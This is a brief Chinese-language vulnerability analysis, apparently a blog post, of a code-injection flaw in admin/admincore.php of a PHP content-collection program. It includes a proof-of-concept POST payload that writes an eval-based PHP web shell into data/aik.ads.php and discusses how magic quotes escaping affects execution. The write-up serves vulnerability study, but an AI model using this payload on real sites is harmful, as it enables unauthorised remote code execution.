此程序漏洞不是我审计的 所以我简单分析一下
漏洞比较鸡柱
审计的程序是最新版
因为此程序都是调用官网的接口 自动采集
所以不会调用 数据库
漏洞文件 admin\admincore.php
POC
Get /admin/admincore.php?act=ads
POST edit=1&ads=fsad';@eval($_POST[1]);//
file_put_contents() 看到此函数 程序接受数据的时候 程序会在
data 目录下生成一个固定的文件 aik.ads.php
data/aik.ads.php
利用方式
对admincore.php 页面 提交POST 参数
在看下写入的文件里面的内容
其实这一句话是没有执行的
为什么没有执行呢
看一下 提交的信息edit=1&ads=fsad';@eval($_POST[1]);//
fsad';@eval($_POST[1]);// 这段内容才是我们提交的内容
fsad 是定义个变量名 单引号 是 闭合 前面程序自动生成的单引号
所以是 因为我们提交的一个单引号 被 转义了 成了 \ 反斜杠
所以导致一句话无法执行
get_magic_quotes_gpc()
在漏洞文件里面看到了此函数
所以 有时候真的很无奈
把反斜杠 去掉
一句话执行了
Fsad变量把内容赋值给ads变量